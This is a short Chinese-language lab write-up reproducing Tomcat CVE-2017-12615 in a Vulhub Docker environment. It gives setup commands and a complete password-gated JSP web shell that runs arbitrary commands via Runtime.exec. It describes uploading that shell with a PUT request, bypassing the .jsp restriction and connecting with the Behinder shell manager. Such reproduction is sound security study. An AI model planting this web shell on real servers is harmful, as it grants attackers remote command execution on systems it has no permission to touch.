环境搭建
利用vulhub搭建环境
1、进入vulhub对应的漏洞目录下
cd /vulhub/tomcat/CVE-2017-12615
2.一键搭建环境
docker-compose up -d

访问成功
复现过程
抓包PUT写入木马
EXP:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

这里需要绕过以下,不能直接上传jsp文件


访问成功

上传冰歇的马子


访问成功,上冰歇

冰歇连接成功
本文档详细介绍了如何使用Vulhub来搭建并复现Tomcat CVE-2017-12615漏洞的过程。通过进入vulhub的相应目录,执行docker-compose命令启动环境,然后通过PUT请求上传恶意代码,成功执行系统命令。此过程中,重点在于绕过限制,不直接上传jsp文件,而是利用了特定的EXP实现。
1110





